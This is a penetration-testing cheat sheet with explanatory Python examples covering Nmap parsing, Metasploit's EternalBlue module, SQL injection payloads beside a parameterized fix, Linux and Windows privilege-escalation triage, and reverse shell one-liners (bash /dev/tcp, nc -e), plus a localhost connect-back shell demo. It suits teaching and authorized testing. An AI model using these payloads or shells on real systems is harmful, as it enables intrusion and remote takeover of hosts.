Quick reference guides for penetration testing, forensics, OSINT, and more.
Essential Nmap commands for network scanning, host discovery, and service enumeration.
# Default scripts (-sC) plus version detection (-sV) on the 1000 most common TCP ports
nmap -sV -sC target
# All 65535 TCP ports with aggressive timing (-T4 is noisy; drop to -T3 on fragile networks)
nmap -p- -T4 target
# SYN (half-open) scan, skipping host discovery (-Pn) so hosts that drop ping still get scanned; needs root
nmap -sS -Pn target
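After a scan the useful step is to turn the output into a host/port/service table rather than reading terminal text. The script below is an added example, not part of the original page or of Nmap: run any of the scans above with `-oX scan.xml` and pass the file contents to `parse_nmap_xml()`. The XML embedded here is a constructed sample in the `nmaprun` format (two hosts, one of them down, one port filtered) so the script runs offline.

```python
"""Parse nmap -oX output into (ip, port, proto, state, banner) rows.

Added example, not from the original page. SAMPLE_XML is a constructed
nmap XML document so the parser can be exercised without a live scan.
"""
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output: one host up with three ports, one host down.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -oX scan.xml 10.0.0.0/29">
  <host><status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/></port>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="8080"><state state="filtered" reason="no-response"/>
        <service name="http-proxy"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="10.0.0.6" addrtype="ipv4"/></host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return [(ip, port, proto, state, banner)] for every port of every host that is up."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data worth keeping
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        for port in host.iter("port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            banner = ""
            if svc is not None:
                # name/product/version are optional attributes; join whichever are present
                banner = " ".join(
                    x for x in (svc.get("name"), svc.get("product"), svc.get("version")) if x
                )
            rows.append((ip, int(port.get("portid")), port.get("protocol"), state, banner))
    return rows


def open_ports(rows):
    """Keep only open ports; filtered and closed entries are noise for service enumeration."""
    return [r for r in rows if r[3] == "open"]


if __name__ == "__main__":
    for ip, port, proto, state, banner in open_ports(parse_nmap_xml(SAMPLE_XML)):
        print(f"{ip}:{port}/{proto} {state} {banner}")
```

Keep the `filtered` rows around in a separate pass when you are profiling a firewall; they are dropped here only because the next step on this page is service enumeration.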
Core Metasploit commands for exploitation, post-exploitation, and pivoting.
# Start Metasploit
msfconsole
# Search exploits (filter by type and name; results list the full module path to pass to use)
search type:exploit name:smb
# Use module (ms17_010 alone is not a module name; the EternalBlue module is)
use exploit/windows/smb/ms17_010_eternalblue
Common SQL injection payloads, bypasses, and database-specific techniques.
# Basic tests (first for a single-quoted string context, second for a double-quoted one)
' OR 1=1--
" OR ""="
# Union-based: the injected SELECT must return as many columns as the original query (two here)
# information_schema exists in MySQL, PostgreSQL and MSSQL, not in SQLite or Oracle
# MySQL needs whitespace after --, so end payloads with "-- -" or "#" there
' UNION SELECT null,table_name FROM information_schema.tables--
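The payloads above only work against code that concatenates input into the query string. The following is an added example, not taken from the original page: a vulnerable lookup next to its parameterized fix, run against an in-memory SQLite database with a constructed `users` table. Because SQLite has no `information_schema`, the union payload here reads table names from `sqlite_master`, SQLite's equivalent catalog; against MySQL or PostgreSQL the page's `information_schema.tables` form applies unchanged.

```python
"""String-built SQL query beside its parameterized fix, exercised with the
page's payloads.  Added example, not from the original page; the database
schema and rows are constructed, and sqlite_master stands in for
information_schema because this runs on SQLite."""
import sqlite3

PAYLOAD_OR = "' OR 1=1--"
# The vulnerable SELECT returns two columns, so the UNION supplies two as well.
PAYLOAD_UNION = "' UNION SELECT name, sql FROM sqlite_master--"


def make_db():
    """Constructed sample database: two users and an unrelated table to discover."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, role TEXT);
        INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user');
        CREATE TABLE secrets (note TEXT);
        """
    )
    return conn


def lookup_vulnerable(conn, username):
    """Concatenates untrusted input into the SQL text: this is the injection point."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Bound parameter: the payload is compared as a literal string and never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, OR payload:   ", lookup_vulnerable(db, PAYLOAD_OR))
    print("vulnerable, UNION payload:", lookup_vulnerable(db, PAYLOAD_UNION))
    print("safe, OR payload:         ", lookup_safe(db, PAYLOAD_OR))
```

The `--` at the end of each payload comments out the closing quote the application appends; if the application wraps the value in double quotes instead, the page's `" OR ""="` form is the one to use.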
Linux privilege escalation techniques, SUID binaries, and kernel exploits.
# Find SUID binaries (add -perm -2000 for SGID; check each hit for a known shell or file-read escape)
find / -perm -4000 -type f 2>/dev/null
# Check sudo rights (NOPASSWD entries and wildcards in the allowed command are the usual wins)
sudo -l
# Kernel version (distribution and kernel decide which exploits apply; kernel exploits can crash the host, so try them last)
uname -a
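The `find` above produces a list; the work is deciding which entries matter. This is an added example, not part of the original page: a walker that collects setuid/setgid regular files under a root, plus a triage step that flags root-owned hits whose basename is in an assumed short list of binaries known to give a shell or file read when setuid (`KNOWN_ESCALATORS`, a hypothetical starting subset rather than a complete list). `demo_tree()` builds a constructed directory with one setuid and one setgid file so the walker can be run without scanning a real system.

```python
"""Enumerate setuid/setgid files and triage them, the programmatic form of
find / -perm -4000.  Added example, not from the original page.
KNOWN_ESCALATORS is an assumed subset of commonly abusable binaries."""
import os
import shutil
import stat
import tempfile

# Assumed starting list; extend it from your own reference of escalatable binaries.
KNOWN_ESCALATORS = {
    "bash", "sh", "find", "vim", "nmap", "python", "python3",
    "perl", "less", "more", "cp", "env", "awk",
}


def find_suid(root):
    """Return [(path, 'suid'|'sgid'|'suid+sgid', owner_uid)] for regular files under root.
    Unreadable directories are skipped, which is why the shell version sends stderr to /dev/null."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = []
            if st.st_mode & stat.S_ISUID:
                bits.append("suid")
            if st.st_mode & stat.S_ISGID:
                bits.append("sgid")
            if bits:
                hits.append((path, "+".join(bits), st.st_uid))
    return hits


def triage(hits):
    """Split hits into (interesting, rest): root-owned files whose basename is a known escalator."""
    interesting = [h for h in hits if h[2] == 0 and os.path.basename(h[0]) in KNOWN_ESCALATORS]
    rest = [h for h in hits if h not in interesting]
    return interesting, rest


def demo_tree():
    """Constructed tree: one setuid file, one setgid file, one plain file.
    Returns find_suid's view as (relative path, kind) pairs and removes the tree."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("find", 0o4755), ("wall", 0o2755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    hits = find_suid(root)
    shutil.rmtree(root)
    return [(os.path.relpath(p, root), kind) for p, kind, _uid in hits]


if __name__ == "__main__":
    print(demo_tree())
    interesting, rest = triage(find_suid("/usr/bin"))
    for path, kind, uid in interesting:
        print(f"[!] {path} ({kind}, uid {uid})")
    print(f"{len(rest)} other setuid/setgid files")
```

Owner matters as much as the bit: a setuid binary owned by an unprivileged user only gets you that user, which is why `triage()` keys on uid 0.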
Windows privilege escalation paths, service exploits, and token manipulation.
# System info (OS name, version and build; the same command lists installed hotfixes further down)
systeminfo | findstr /B /C:"OS"
# Find unquoted service paths: auto-start services outside C:\Windows whose binary path contains no quotes
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Current privileges (SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are the token-abuse starting points)
whoami /priv
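An unquoted path is only exploitable at the specific filenames Windows tries before the real binary, and those are easy to compute. The following is an added example, not from the original page: given service `PathName` values in the shape `wmic service get name,pathname` (or `Win32_Service.PathName`) returns, it reports each unquoted, space-containing path together with the candidate filenames the service manager would try first. The four service entries are constructed.

```python
r"""Detect unquoted service binary paths and list the hijack candidates.

Added example, not from the original page.  SAMPLE_SERVICES holds constructed
(name, PathName) pairs; on a real host feed it the wmic / Win32_Service output."""

# Constructed sample of (service name, PathName) pairs.
SAMPLE_SERVICES = [
    ("VulnSvc", r"C:\Program Files\Vendor App\bin\service.exe -k run"),
    ("QuotedSvc", r'"C:\Program Files\Vendor App\bin\service.exe" -k run'),
    ("SystemSvc", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("NoSpaceSvc", r"C:\Tools\agent.exe"),
]


def hijack_candidates(pathname):
    r"""For an unquoted path with spaces, return the filenames tried before the real one,
    e.g. C:\Program.exe then C:\Program Files\Vendor.exe.  Returns [] for quoted paths,
    paths without spaces, and paths under C:\Windows (mirrors the wmic one-liner's filters)."""
    if pathname.startswith('"'):
        return []
    low = pathname.lower()
    idx = low.find(".exe")
    if idx == -1:
        return []
    exe = pathname[: idx + 4]  # drop service arguments after the executable
    if " " not in exe or low.startswith(r"c:\windows"):
        return []
    parts = exe.split(" ")
    # Each space is a split point: the text before it, with .exe appended, is tried first.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_unquoted(services):
    """Map service name -> hijack candidates for every vulnerable-looking entry."""
    out = {}
    for name, pathname in services:
        cands = hijack_candidates(pathname)
        if cands:
            out[name] = cands
    return out


if __name__ == "__main__":
    for name, cands in find_unquoted(SAMPLE_SERVICES).items():
        print(name)
        for c in cands:
            print("   ", c)
```

A candidate is only useful if its parent directory is writable by your current user and the service runs as a higher-privileged account and can be restarted or the host rebooted; check both before spending time on it.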
Reverse shell one-liners for Bash, Python, PHP, Powershell, and more.
# Bash (needs bash, not sh: /dev/tcp is a bash feature; replace IP and PORT with your listener)
bash -i >& /dev/tcp/IP/PORT 0>&1
# Python
python -c 'import socket,subprocess;...'
# Netcat (-e exists in traditional netcat and ncat only; OpenBSD nc has no -e)
nc -e /bin/sh IP PORT
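Every one-liner above does the same thing: connect out, then hand the connection to a shell as its standard input, output and error. The script below is an added example, not from the original page, and shows both ends of that exchange in one process on 127.0.0.1 so it can be run offline: `listen_and_run()` plays the listener (the `nc -lvp PORT` side), and `connect_back()` plays the victim, spawning `/bin/sh` with the socket bound to file descriptors 0, 1 and 2, which is exactly what `0>&1` and `>&` do in the bash one-liner. It assumes a POSIX `/bin/sh` and loopback networking.

```python
"""Reverse shell mechanics on localhost: listener plus connect-back.

Added example, not from the original page.  Both sides run in one process
against 127.0.0.1; connect_back() is the part that would run on the target."""
import socket
import subprocess
import threading


def connect_back(host, port):
    """Target side: connect to the listener and give /bin/sh the socket as fds 0, 1 and 2."""
    s = socket.create_connection((host, port))
    # Popen accepts any object with fileno(); the shell's stdio becomes the socket.
    proc = subprocess.Popen(["/bin/sh"], stdin=s, stdout=s, stderr=s)
    s.close()  # the child holds its own copy; closing ours lets EOF reach the listener on exit
    proc.wait()
    return proc.returncode


def listen_and_run(command, timeout=10):
    """Listener side: bind an ephemeral port, wait for the callback, send one command, return its output."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    srv.settimeout(timeout)

    # Launch the "victim" in a thread; on a real engagement this is the one-liner on the target.
    t = threading.Thread(target=connect_back, args=("127.0.0.1", port), daemon=True)
    t.start()

    conn, _peer = srv.accept()
    conn.sendall((command + "\nexit\n").encode())
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:  # EOF: the shell exited and its socket fds closed
            break
        chunks.append(data)
    conn.close()
    srv.close()
    t.join(timeout)
    return b"".join(chunks).decode()


if __name__ == "__main__":
    print(listen_and_run("id; uname -a"), end="")
```

Because stderr is also bound to the socket, error text from the shell comes back over the same connection; with `-i` (as in the page's bash variant) the prompt would arrive there too, which is why this example runs `/bin/sh` without it.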